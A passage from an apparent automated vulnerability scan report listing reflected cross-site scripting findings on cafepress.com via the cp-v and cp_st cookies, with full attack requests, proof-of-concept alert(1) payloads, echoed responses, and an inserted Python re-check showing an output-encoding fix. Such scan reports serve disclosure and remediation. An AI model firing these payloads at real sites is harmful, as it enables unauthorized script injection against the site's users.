2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA10557"-alert(1)-"7c7111c0034 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.81. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/catalogExp/RedirectWithSEOURL.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97a3f</script><script>alert(1)</script>4b81aaff511 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=97a3f</script><script>alert(1)</script>4b81aaff511 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 75223
Date: Sun, 26 Dec 2010 13:46:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HomePage' window.cafepress.tealeaf.searchTerm = '97a3f</script><script>alert(1)</script>4b81aaff511 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
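The two reflection sites that recur throughout these entries are the cp-v cookie landing inside the double-quoted s.eVar30 literal and the cp_st cookie landing inside the single-quoted window.cafepress.tealeaf.searchTerm literal. The Python below is an added example, not code from this report or from cafepress.com; it re-runs the scanner's "echoed unmodified" check offline against page skeletons constructed from the response snippets above (render_naive, render_safe, classify_reflection and the skeletons are illustrative, and the only values taken from the report are the cookie base value, the s.eVar30 prefix and the canaries from entries 1.76 and 1.77). It also shows the literal encoder (JSON escaping plus \u003c/\u003e/\u0026 rewriting) that the remediation text asks for, and confirms that both canaries become inert once the literal is produced that way.

```python
"""Offline re-check of the two reflection sites in this report and the
encoding that would close them. Added example; not code from the XSS.CX
report or from cafepress.com. Page fragments are constructed from the
response snippets in entries 1.76 and 1.77."""
import json
import re

# Base cookie value and the exact canaries Burp submitted (entries 1.76, 1.77).
CPV_BASE = "D0026F27AADDAF9A26C54608326FC1BA"
CPV_PAYLOAD = 'fa7a8"-alert(1)-"e7fc2e4ad80'
CPST_PAYLOAD = '4f3e8</script><script>alert(1)</script>edf8d16990b'
EVAR30_PREFIX = "A8D8655B7B25F13535D4E6E67BEC27E9:"

# Constructed page skeletons; {literal} is where the server writes the
# JavaScript string literal built from the cookie value.
DOUBLE_QUOTED_PAGE = (
    '<html><head><script type="text/javascript">\n'
    "s.eVar30 = {literal};\n"
    's.eVar26 = "";\n'
    "</script></head><body></body></html>"
)
SINGLE_QUOTED_PAGE = (
    "<html><head><script>\n"
    "window.cafepress.tealeaf.searchTerm = {literal}\n"
    "window.cafepress.tealeaf.salesChannel = 'Marketplace'\n"
    "</script></head><body></body></html>"
)


def render_naive(page: str, quote: str, value: str) -> str:
    """The vulnerable pattern: quote + raw cookie value + quote."""
    return page.replace("{literal}", quote + value + quote)


def js_string_literal(value: str) -> str:
    """Encode value as a double-quoted JS string literal that can end neither
    the literal nor the enclosing <script> element. json.dumps escapes
    backslash, double quote and control characters and, with its default
    ensure_ascii=True, the U+2028/U+2029 line terminators; '<', '>' and '&'
    are then rewritten as JS unicode escapes so that neither '</script>' nor
    '<!--' can ever appear inside the script text."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_safe(page: str, value: str) -> str:
    """Same page with the literal produced by js_string_literal."""
    return page.replace("{literal}", js_string_literal(value))


def decodes_back(value: str) -> bool:
    """Sanity check: the encoded literal still denotes exactly value."""
    return json.loads(js_string_literal(value)) == value


SCRIPT_OPEN = re.compile(r"<script\b", re.I)
SCRIPT_CLOSE = re.compile(r"</script", re.I)


def classify_reflection(body: str, canary: str):
    """Locate an unmodified copy of canary in body, the way the scanner did.
    Returns None when the canary is not echoed verbatim; otherwise a dict
    with the context ('script' or 'html'), the JS string literal open at
    that point (None, '"' or "'") and whether the canary carries what it
    needs to break out of that context."""
    idx = body.find(canary)
    if idx == -1:
        return None
    opens = [m.start() for m in SCRIPT_OPEN.finditer(body, 0, idx)]
    closes = [m.start() for m in SCRIPT_CLOSE.finditer(body, 0, idx)]
    in_script = bool(opens) and (not closes or opens[-1] > closes[-1])
    if not in_script:
        return {"context": "html", "quote": None, "breakout": "<" in canary}
    # Scan the script text up to the canary, tracking the open string literal.
    quote = None
    i = body.find(">", opens[-1]) + 1
    while i < idx:
        ch = body[i]
        if quote is None and ch in "\"'":
            quote = ch
        elif quote is not None and ch == "\\":
            i += 1                      # skip the escaped character
        elif ch == quote:
            quote = None
        i += 1
    breakout = ("</script" in canary.lower()
                or (quote is not None and quote in canary))
    return {"context": "script", "quote": quote, "breakout": breakout}


def run_report() -> dict:
    """Evaluate both reflection sites, naive and hardened."""
    cpv_value = EVAR30_PREFIX + CPV_BASE + CPV_PAYLOAD
    return {
        "cp-v naive": classify_reflection(
            render_naive(DOUBLE_QUOTED_PAGE, '"', cpv_value), CPV_PAYLOAD),
        "cp-v safe": classify_reflection(
            render_safe(DOUBLE_QUOTED_PAGE, cpv_value), CPV_PAYLOAD),
        "cp_st naive": classify_reflection(
            render_naive(SINGLE_QUOTED_PAGE, "'", CPST_PAYLOAD), CPST_PAYLOAD),
        "cp_st safe": classify_reflection(
            render_safe(SINGLE_QUOTED_PAGE, CPST_PAYLOAD), CPST_PAYLOAD),
    }


if __name__ == "__main__":
    for name, verdict in run_report().items():
        print(f"{name:12s} {verdict}")
```

Run as a script it prints the four verdicts: both naive renderings report a script context whose open quote (or the `</script` sequence) is present in the canary, and both hardened renderings report no verbatim echo at all, which is the result the scanner would need to see to stop flagging these cookies. Two practitioner notes: the quote tracker only models the string-literal context this report describes, not every place a cookie might land, so treat it as a re-check of these findings rather than a general XSS detector; and the "attacker must first set a cookie" caveat in each issue detail is weaker than it reads here, because the Set-Cookie headers in these responses scope cookies to domain=cafepress.com, so a cookie planted by any host under that parent domain, or over plain http by an on-path party, is sent with these requests. Neither of those is a finding on this page; they are the general conditions under which cookie-reflected script injection becomes reachable.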
1.82. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/catalogExp/addtocarthelper.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 758b2"-alert(1)-"7bb18591cca was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA758b2"-alert(1)-"7bb18591cca ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 ntCoent-Length: 41323 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 41323 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA758b2"-alert(1)-"7bb18591cca "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.83. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/catalogExp/addtocarthelper.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a79f</script><script>alert(1)</script>f30bd18751f was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4a79f</script><script>alert(1)</script>f30bd18751f ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 ntCoent-Length: 41343 Date: Sun, 26 Dec 2010 13:46:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 41343 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... ryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/error404.aspx?404;http://www.cafepress.com:80/cp/addtocart.aspx' window.cafepress.tealeaf.searchTerm = '4a79f</script><script>alert(1)</script>f30bd18751f ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.84. http://www.cafepress.com/cp/info/about/ [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/about/
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4954"-alert(1)-"ab20618713b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/about/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAa4954"-alert(1)-"ab20618713b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 46269 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 46269 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAa4954"-alert(1)-"ab20618713b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.85. http://www.cafepress.com/cp/info/about/ [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/about/
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55d2b</script><script>alert(1)</script>e9999fa4cb2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/about/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=55d2b</script><script>alert(1)</script>e9999fa4cb2 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; 